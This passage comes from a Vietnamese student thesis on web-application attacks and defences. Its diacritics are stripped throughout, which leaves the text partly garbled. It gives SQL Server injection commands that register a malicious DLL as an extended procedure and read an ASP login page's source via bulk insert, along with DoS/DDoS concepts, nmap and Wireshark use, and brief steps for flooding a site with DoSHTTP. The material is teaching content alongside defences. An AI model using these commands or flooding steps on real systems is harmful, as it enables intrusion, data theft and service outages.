Xp_loginconfig Ly thng tin v ch bo mt trn server
Xp_makecab cho php ngi s dng to cc tp tin lu tr trn
Server (hay bt c tp tin no m server c th truy x
2.7.5. Dng Extended Stored Procedure t to
Extended stored procedure API l mt chng trnh c mt nhim v n
gin l to ra mt DLL extended stored porcedure cha ng on m nguy him.
a tp tin DLL ln Server c th dng cc cu lnh, hoc cc k thut giao tip khc
nhau c thc hin t ng, nh l HTTP download v FTP script.
SV :Nguyn Vn i 41
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
42/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Mt khi tp tin DLL tn ti trn my ch, th hacker c th to mt extended stored
procedure bng dng lnh sau :
V d 19:
sp_addextendedproc xp_webserver, c:\temp\xp_foo.dll
Sau c th thc thi n nh l thc thi extended stored procedure thng
thng :
exec xp_webserver
Khi thc hin xong, c th xo bng lnh sau:
sp_dropextendedproc xp_webserver
Xp_ntsec_enumdomainlit k nhng domain m server c th truy vn.
Xp_terminate_process chm dt mt tin trnh vi tham s PID ca n.
2.7.6 Nhp tp tin vn bn vo bng
Dng lnh bulk insert, nhp d liu t mt tp tin vn bn vo trong mt bng tm
thi.
V d 24 to mt bng n gin nh sau:
create table foo (line varchar(8000))
Sau chy cu lnh bulk insert chp d liu t tp tin vo bng
V d 25:
bulk insert foo from c:\inetpub\wwwroot\process_login.asp
Ni dung trang process_login.asp c th ly v bng cch dng nhng k thut nh
trong V d 18.
2.7.7 CCH PHNG CHNG
Trong hu ht trnh duyt, nhng k t nn c m ho trn a ch URL
trc khi c s dng.
Vic tn cng theo SQL Injection da vo nhng cu thng bo li do vic
phng chng hay nht vn l khng cho hin th nhng thng ip li cho ngi dng
SV :Nguyn Vn i 42
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
43/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
bng cch thay th nhng li thng bo bng 1 trang do ngi pht trin thit k mi
khi li xy ra trn ng dng.
Kim tra k gi tr nhp vo ca ngi dng, thay th nhng k t nh ; v..v..
Hy loi b cc k t meta nh ' , " , / , \ , ; v cc k t extend nh NULL,CR, LF, ...
trong cc string nhn c t:
- d liu nhp do ngi dng trnh
- cc tham s t URL
- cc gi tr t cookie
i vi cc gi tr numeric, hy chuyn n sang integer trc khi thc hincu truy vnSQL, hoc dng ISNUMERIC chc chn n l mt s integer.
Dng thut ton m ho d liu
3 K thut tn cng gy trn b m v t chi dch
v(Buffer overflow)
K thut ny ch yu khai thc vic ngi dng m vt qu lng b nh cp
pht ban u bi ng dng do gy choh thng lm vo tnh trng trn b nh, thmch c th b chn thm mt on m bt k. Nu ng dng c cu hnh c thcthi nh root th ngi tn cng c th thao tc nh mt nh qun tr h thng ca webserver.
y l mt cch tn cng c coi l kinh in . y trong n ny ti s
trnh by mt k thut tn cng gy trn b m v t chi dch v l Dos.
3.1 Khi nim
Tn cng kiu DoS l kiu tn cng lm cho cc dch v mng b t lit, khngcn kh nng p ng c yu cu na. Loi tn cng ny nh hng n nhiu hthng, rt d thc hin v li rt kh bo v h thng khi kiu tn cng DoS. Thngthng, kiu tn cng DoS da trn nhng giao thc (protocol). V d vi
SV :Nguyn Vn i 43
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
44/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
giao thc l ICMP, hacker c th s dng bomb e-mail gi hng ngn thng ipemail vi mc ch tiu th bng thng lm hao ht ti nguyn h thng trn mailserver. Hoc c th dng phn mm gi hng lot yu cu n my ch khin chomy ch khng thp ng nhng yu cu chnh ng khc.
3.2 Cc i tng b nh hng bi kiu tn cng ny
TN CNG TRN SWAP SPACEHu ht cc h thng u c vi trm MB khng gian chuyn i ( swap space)
phc v cho nhng yu cu t my khch. Swap space thung dng cho cc tintrnh con c thi gian ngn nn DoS c th c da trn phng thc lm trn yswap space.
TN CNG TRN BANDWIDTH:Phn bng thng dnh cho mi h thng l gii hn, v th nu hacker cng lc
gi nhiu yu cu n h thng th phn bng thng khng p ng cho mt khi
lng d liu ln v dn n h thng b ph v. TN CNG VO RAM:Tn cng Dos chim 1 khong ln ca RAM cng c th gy ra cc vn ph
hy h thng. Kiu tn cng BufferOverflow l mt v d cho cch ph hy ny TN CNG VO DISKS:Mt kiu tn cng c in l lm y a cng. a cng c th b trn v khng
th c s dng na.
3.3 Cc kiu tn cng DDos3.3.1 Kiu tn cng th 1Hacker hon ton c kh nng lm ngp h thng v bng thng ca hacker ln
hn bng thng ca my ch. Kiu tn cng ny khng b hn ch bi tc truyn mng.v d: Hacker c mt ng truyn tc cao T1 ( 1.544- Mbps ) hayln hn c th d dng ph v mt h thng c ng truyn 56Kbps.
3.3.2. Kiu tn cng th 2Kiu tn cng ny c s dng khi ng truyn mng ca hacker l qu thp
so vi ng truyn ca my ch.Khng ging nh kiu tn cng DoS truyn thng ( phn 2 ), kiu tn cng vo
bng thng ln hn s li dng nhng gi tin t nhng h thng khc nhau cng mtlc tin n h thng ch khin cho ng truyn ca h thng ch khng cn kh
nng p ng, my ch khng cn kh nng nhn mt gi tin no na. Kiu tn cngny s loi my ch ra khi Internet.
y l phng php tn cng kiu t chi dch v nhng khng l DoS m gil DDoS ( kiu t chi dch v phn tn ), ngha l cng mt lc nhiu my sc
pht ng gi gi tin n my ch, lm cho my ch khng cn kh nng tipnhn gi tin v b loi khi mng Internet.
Bng cch gi a ch IP ca my ch, hacker s cng lc gi nhiu gi tin
SV :Nguyn Vn i 44
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
45/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
n cc h thng my mnh trn mng, cc h thng ny khi nhn gi tin SYN gi ny,chp nhn kt ni v gi tr mt gi tin SYN/ACK thng bo. V a ch IP ca gitin SYN b hacker sa i thnh a ch IP my ch nn nhng gi tin SYN/ACK sc gi v cho my ch. Cng mt lc nhn c nhiu gi tin, ng truyn camy ch khng kh nng p ng, h thng my ch t chi nhn bt k gi tin
no v lc ny h thng my ch b sp .
3.3.3. Kiu tn cng vo ti nguyn h thngy l kiu tn cng nhm vo ti nguyn h thng hn l ti nguyn mng nh
CPU, b nh, file h thng, tin trnh..Hacker l mt ngi dng hp l ca hthng, v c mt lng ti nguyn gii hn trn h thng. Tuy nhin, hacker s lmdng quyn truy cp ny yu cu thm ti nguyn. Nh vy, h thng hay nhngngi dng hp l s b t chi s dng ti nguyn chia s.
Kiu tn cng s khin cho h thng khng th s dng c v ti nguyn bs dng ht, khng cn tin trnh thc thi na
3.4 Cch phng chng
Kiutn cng t chi dch v tuy ch khin cho h thng b ph v trong vipht nhng hu qu th kh to ln (nh hng trn phm vi tin v uy tn). y l kthut thng c hacker s dng trong trng hp khng th chim quyn qun trtrn h thng hoc thng tin, hoc mun ph hy uy tn ca c quan .Thm vovic gi mo a ch khin cho hacker cng d dng thc hin vic tn cng mkhng s b pht hin.
Kiu tn cng t chi dch v l kiu tn cng gy nhiu kh khn trong vn bo v cng nh iu tra tm ra th phm nht, bi v hu ht hacker thay i a chIP ca my mnh nn rt kh xc nh ai l th phm. phng chng kh nng khuych i ng truyn, cn:- Hu kh nng broadcast ti router bin- Tng kch thc hng i kt niTa c th phng trnh kh nng trn hng i qua nhiu kt ni, nhng cch ny sdng nhiu ti nguyn:- Gim thi gian thit lp kt ni- Dng nhng phn mm pht hin v ph hy kiu tn cng DoS:Hu ht nhng h iu hnh hin nay u h tr kh nng pht hin v phng chng
kiu tn cng lt SYN.Tuy nhin cng c nhng phn mm c c kh nng trnh kiu tn cng
ny.V d nh vi Linux kernels 2.0.30 v v sau ci t mt ty chn gi l SYN Cookie ,kernel c nhim v truy tm v lu vt nhng kh nng c th xy ra k thut SYN. Sau, kernel s s dng mt giao thc m ho nh SYN cookie cho php ngi dng hpl ca h thng tip tc kt ni n h thng Vi WindowNT 4.0 tr v sau, s dng k
SV :Nguyn Vn i 45
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
46/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
thut backlog, mi khi hng i kt ni khng p ng, h thng t ng cung cpti nguyn cho hng i, v th hngi s khng b ph v.
ng dng ch cho php mi mt my con chc thit lp s kt ni ti a theoqui nh trnh trng hp hacker gi cng lc nhiu yu cu gy tc nghn.
CHNG 3 GII THIU MT S CNG C PH
DNG TRONG K THUT TN CNG V BO MT
NG DNG WEB
SV :Nguyn Vn i 46
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
47/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
3.1. Tool scanning
Trong k thut tn cng cng nh bo mt ng dng web th thao tc u tin
thng l thao tc kim tra li h thng nhm xc nh li ca h thng . Cc cng c
d tm li(tool scanning) h tr c lc cho cng vic ny , cc hacker c th dngchng d tm li v sau c th dung framework hay code c sn trn mt s ti
liu hay internet m tn cng ng dng web. Nhng n cng l cng c hu ch cc
nh qun tr mng , cc nh qun tr h thng ng dng web nhs gi li mc bo
mt ca h thng ng dng web t c nhng phng pht bo mt hay v li tng
ng .
Trong n ny ti s gii thiu mt tool scanning m ngun m rt thng
dng l nmap. Nmap mt cng c rt d s dng bn c th s dng dng lnh trn
mi trng dos hay c th s dng cc ty chn trc tip trn chnh giao din ca
nmap .
Hnh 1 giao din ca nmap
SV :Nguyn Vn i 47
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
48/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Giao din thn thin vi ngi dung nn nmap rt d s dng. Di y v d
minh ha ng dng web. y l host forum.congthuongit.net. Thc hin in:
Target: forum.congthuongit.net. profile:Intense sacan . Chng ta thu c
nhng kt qu
Hnh 2 m t kiu qut intense ca nmap
Hnh 3 kt qu khi dng nmap phn (nmap out)
SV :Nguyn Vn i 48
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
49/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Hnh 4 Kt qu trn nmap out (tip)
y l hnh nh giao thc ca h thng ng dng web
SV :Nguyn Vn i 49
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
50/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Hnh 5 hnh nh ca host ang kim tra
Mc d c rt nhiu chc nng nhng c nhng lc nmap cng khng xc nhc chnh xc cc thng s ca i tng. Nh trong trng hp trn Nmap khng
xc nh c thng tin v phn mm ca host(no Os matches for host). Khi bn s
dng namap qut mt host no th sau c th sy ra tnh trng khng truy cp
vo trang web ny na bn ng lo lng vi pht sau bn s truy cp c.
2. Cng c bt gi tin
Dng cng c bt gi tin l mt cch ph bin nghe ln cc gi tin trn mng.Trong n ny ti s gii thiu cng c wireshare. Mt cng c m ngun m giao
din ha thn thin d s dng.
SV :Nguyn Vn i 50
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
51/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Hnh 6 giao din ca wireshare
Bn click vo mc interface list chn card mng v chn start
Ta c giao din sau(hnh 7).
Phn mu vng l nhng gi tin ang c truyn ti bn. Phn bn did l nhngthng tin ca gi tin c m ha di dng hexa.
SV :Nguyn Vn i 51
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
52/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Hnh 7 giao din ca wireshare khi bt gi tin
Khi bn nhp vo phng m hexa hoc cc dng thng tin bn s thu c thngtin ca gi tin c m ha. Nhu hinh di
Hnh 8 Thng tin ca nhng gi tin m wireshare bt c
SV :Nguyn Vn i 52
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
53/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Bn c th save nhng thng tin ny ra v s dng n sau.Cng vic tip theo
ca bn l tm thm phn mm dich nhng m ha ra v c thng tin ca nhng
gi tin .
3 Cng c dng tn cng dos ng dng webNh trnh by chng 2 phng php tn cng d l mt phng php
kinh in kh phng trnh. y ti s gii thiu vi cc bn cgn c DoSHTTP 2.5
mt cng c rt ph dng trong vic tn cng dos ng dng web mt cng c m cc
Hacker hay dng. Giao din ca DoSHTTP 2.5(hnh 9).
Hnh 9 Giao din ca DoSHTTP 2.5
Thao tc vi cng c ny rt d dng, hacker ch cn nhp vo target URL a
ch con ddos. Chn s socket v nhn start flood. V sau ch vic ngi i ch
khong 5 pht sau host s khng truy cp c. Cnh bo vic tn cgn ng dng
web l tri php lut nn bn khng th ty tin s dng cng c ny.
SV :Nguyn Vn i 53
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
54/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
PHN KT LUN V HNG PHTTRIN CA N
ng dng web pht trin vi tc chng mt v v vy k thut tn cng v
bo mt ng dng web cng pht trin vi trnh cao. Tn cng v bo mt ng dng
web l mt ti rt rng i hi s am hiu v phi c k thut chuyn mn cao. Do
thi gian lm n ngn v k thut ca em cn c hn nn nhng phn em trnh by
n ny mi l nhng kin thc c bn v cn nhiu hn ch . Nhng c s gip tn tnh ca ca cc thy trong khoa cng ngh thng tin nht l thy Hunh
Nguyn Thnh Lun v cng chnh v c nhn v lm n ny em hiu r hn
nhng khi nim chuyn mn lin quan n ng dng web m lu nay em nm cha
chc. Em cng hiu r hn v nhng k thut tn cng ng dng c bn l nn tng cho
nhng phng pht tn cng hin i ng thi em cng bit c mt s phng
php phng trnh tn cng v bo mt ng dng web.
Nhng kin thc ny s gip ch rt nhiu cho em sau ny. Nhng kin thc nys gip em c nn tng vng chc hn v k thut chuyn mn lin quan n k thut
bo mt ng dng web. Sau khi thc hin xong n ny em s s dng nhng kin
thc tm hiu v c gng hc thm, tm hiu thm nhng kin thc chuyn mn lin
quan nhm xy dng m cng c hay mt phuong php bo mt ng dng web hiu
qu trc cc cuc tn cng.
SV :Nguyn Vn i 54
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
55/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Ti liu tham kho
Trong n ny em tham kho rt nhiu bi vit ca cc tc gi , nht l trn
internet sau y l thng tin ti liu.
Lun vn tt nghip Nghin cu mt s vn bo mt ng dng web trn internet
ca Nguyn Duy Thng v Nguyn minh Th.
ETHICAL HACKING 1-5 by EC-Council
http://vietbao.vn/Vi-tinh-Vien-thong/Tim-hieu-ve-cac-ung-dung
Web/65082882/229/
http://iht.vn/mang-bao-mat/505-tim-hieu-ve-cac-ung-dung-web.html
http://www.onboom.com/kien-thuc-ve-web/quang-ba-website/1598-kien-truc-net-
trong-mo-hinh-ung-dung-thuong-mai-dien-tu.html
http://www.vnsolutions.net/cms/vi/chi-tiet/ung-dung-web-(webapp)-la-gi/30
http://vovanhai.wordpress.com/web/jsp/mo-hinh-mvc-va-1-vi-d%E1%BB%A5-
%E1%BB%A9ng-d%E1%BB%A5ng/
http://web.dongtak.net/spip.php?article125
http://www.truongchieu.0fees.net/diendan/130/PHP/Thuat-ngu.html
http://Cht xu v bo mt trang web cho ngi khng chuyn.htm
http://CCH HACK WEBSITE - YuMe_vn.htm
http://Cch tn cng h thng Cisco(Trang 1) - H thng mng CISCO - Din n
trung tm Zonotek - Powered by Discuz! Archiver.htm
http://thuynt' Blog - Nhng l hng bo mt thng gp trn website.htm
The end
http://www.truongchieu.0fees.net/diendan/130/PHP/Thuat-ngu.htmlhttp://www.truongchieu.0fees.net/diendan/130/PHP/Thuat-ngu.html